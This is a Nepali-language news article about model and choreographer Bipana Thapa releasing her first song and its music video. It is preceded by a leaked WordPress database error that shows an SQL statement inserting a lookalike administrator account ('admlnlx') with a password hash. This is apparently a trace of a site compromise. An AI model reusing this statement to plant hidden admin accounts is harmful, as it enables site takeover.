WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BegOx2BOmE7Smd3x1DJaiUATmS6oSq0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-22 03:59:06', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १३–
विपना थापा, मोडल तथा कोरियोग्राफर हुन् । अब उनको परिचय यतिमा मात्र सिमित रहेन छ । म्युजिक भिडियो र विभिन्न इभेन्टहरुमा आफूलाई व्यस्त गराउँदै आएकी विपनाले आफ्नै आवाजमा गीत सार्वजनिक गरेपछि अब उनी गायिका समेत बनेकी छिन् । विपनाको स्वर रहेको ‘तिमै्र नाउँमा यो जीवन’ बोल गीतलाई दुई दिन लगाएर भिडियो निर्माण गरिएको छ ।
आफ्नो पहिलो गीत भएकाले भिडियो निर्माणमा पनि मिहिनेत गरेको विपनाले बताइन् । यस गीतको भिडियो मंगलबार र बुधबार चोभारमा छायांकन गरिएको छ ।
राकेश गुरुङको म्युजिक एरेञ्ज रहेको ‘तिमै्र नाउँमा यो जीवन’ मा संगीत तथा शब्द प्रमोद कोइरालाको रहेको छ । अर्जुन अधिकारीको निर्देशन रहेको गीतमा विपनाले नै मोडलिङ गरेकी छन् । विपनासँगै भिडियोमा समिम खानले अभिनय गरेका छन् । यस म्युजिक भिडियोमा पछिल्लो समयका चर्चित फेसन डिजाइनर कमल मानन्धरले तयार गरेको पहिरनमा विपनालाई देख्न सकिन्छ ।
हरि हुमागाइँको छायांकन र निशान घिमिरेको सम्पादन रहेको यस भिडियोलाई केही दिनमै दर्शकले हेर्न पाउन मोडल तथा गायिका विपनाले बताइन् ।
विपनाले पछिल्लो समय ‘कलेज क्वीन नेपाल’ र ‘सिन्डे«ला नेपाल’ जस्ता प्रतियोगिताको कोरियोग्राफी गरेकी छिन् ।